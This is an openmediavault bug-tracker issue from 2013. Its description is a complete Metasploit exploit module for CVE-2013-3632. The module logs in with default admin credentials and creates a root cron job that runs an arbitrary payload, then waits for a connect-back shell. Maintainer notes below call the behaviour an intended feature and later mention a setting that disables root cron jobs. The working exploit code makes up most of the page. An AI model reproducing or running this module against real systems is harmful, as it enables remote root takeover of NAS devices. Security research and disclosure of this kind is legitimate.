2018-01-17 19:06 CET

View Issue Details Jump to Notes ]
IDProjectCategoryView StatusLast Update
0000907openmediavaultBugpublic2018-01-10 22:44
ReporterTurgan 
Assigned Tovotdev 
PriorityimmediateSeveritymajorReproducibilityN/A
StatusclosedResolutionno change required 
Product VersionSardaukar (0.5.x) 
Target VersionFixed in Version 
Summary0000907: OMV Cron Remote Command Execution Vulnerability Exploit
Description##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::HttpClient
 
  def initialize(info={})
    super(update_info(info,
      'Name' => 'OpenMediaVault Cron Remote Command Execution',
      'Description' => %q{
      OpenMediaVault allows an authenticated user to create cron jobs as aribtrary users on the system.
      An attacker can abuse this to run arbitrary commands as any user available on the system (including root).
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Brandon Perry <bperry.volatile[at]gmail.com>' # Discovery / msf module
        ],
      'References' =>
        [
          ['CVE', '2013-3632'],
          ['URL', 'https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats']
        ],
      'Privileged' => true,
      'DefaultOptions' => { 'WfsDelay' => 60 },
      'Payload' =>
      {
        'Compat' =>
        {
          'PayloadType' => 'cmd',
          'RequiredCmd' => 'generic perl ruby bash telnet python',
        }
      },
      'Platform' => ['unix', 'linux'],
      'Arch' => ARCH_CMD,
      'Targets' => [['Automatic',{}]],
      'DisclosureDate' => 'Oct 30 2013',
      'DefaultTarget' => 0
    ))
 
    register_options(
    [
      OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin']),
      OptString.new('PASSWORD', [ false, "Password to authenticate with", 'openmediavault'])
    ], self.class)
  end
 
  def exploit
    init = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, '/index.php')
    })
 
    sess = init.get_cookies
    post = "{\"service\":\"Authentication\",\"method\":\"login\",\"params\":{\"username\":\"#{datastore["USERNAME"]}\",\"password\":\"#{datastore["PASSWORD"]}\"}}"
 
    login = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/rpc.php'),
      'data' => post,
      'ctype' => 'application/json',
      'cookie' => sess
    })
 
    if !login or login.code != 200
      fail_with("Login failed")
    end
 
    sess = login.get_cookies
    post = '{"service":"Cron","method":"set","params":{"enable":true,"minute":"*","hour":"*","dayofmonth":"*","month":"*","dayofweek":"*","username":"root","command":"'
    post << payload.encoded.gsub('"', '\"')
    post << '","comment":"","type":"userdefined","everynminute":false,"everynhour":false,"everyndayofmonth":false,"sendemail":false,"uuid":"undefined"}}'
 
    resp = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/rpc.php'),
      'data' => post,
      'ctype' => 'application/json',
      'cookie' => sess
    })
 
    if !resp or resp.code != 200
      fail_with("Posting cron failed.")
    end
 
    print_status("Waiting for connect-back, this will take up to a minute")
  end
end
 
# 49F7317D7868E442 1337day.com [2013-11-23] 385AC97286DB38CE #
Steps To Reproduce-use MSF
-bind the code
-you dont like to see this happends if your cron is older enought.
Additional Information_ here is the main source _
http://www.1337day.com/exploit/21421
TagsNo tags attached.
Product build
Attached Files

-Relationships
+Relationships

-Notes

~0002593

votdev (administrator)

Last edited: 2013-11-23 22:53

View 2 revisions

I already know that issue, but it will not be fixed because it ist a feature that was added to allow the user to create cron jobs that are executed as root user.
If it will be removed there will be Users that are really disapointed about that.

~0002594

votdev (administrator)

This vulnerability report is nonsense because you are also able to wipe whole devices or delete filesystems via webgui.

~0005103

votdev (administrator)

Last edited: 2018-01-10 22:44

View 2 revisions

Since openmediavault 0.5.32 it is possible to disable user root in cron jobs by setting the environment variable OMV_USERMGMT_ENUMERATE_USER_ROOT to FALSE in /etc/default/openmediavault. See https://github.com/openmediavault/openmediavault/commit/e9045daaedc973fa18525d63457eccac2926c734#diff-1030a4428d20248a6f7dd797db03967b.

+Notes

-Issue History
Date Modified Username Field Change
2013-11-23 22:38 Turgan New Issue
2013-11-23 22:38 Turgan Status new => assigned
2013-11-23 22:38 Turgan Assigned To => votdev
2013-11-23 22:52 votdev Note Added: 0002593
2013-11-23 22:53 votdev Note Edited: 0002593 View Revisions
2013-11-23 23:23 votdev Note Added: 0002594
2013-11-23 23:23 votdev Status assigned => closed
2013-11-23 23:23 votdev Resolution open => fixed
2013-11-23 23:24 votdev Resolution fixed => no change required
2018-01-10 22:42 votdev Note Added: 0005103
2018-01-10 22:44 votdev Note Edited: 0005103 View Revisions
+Issue History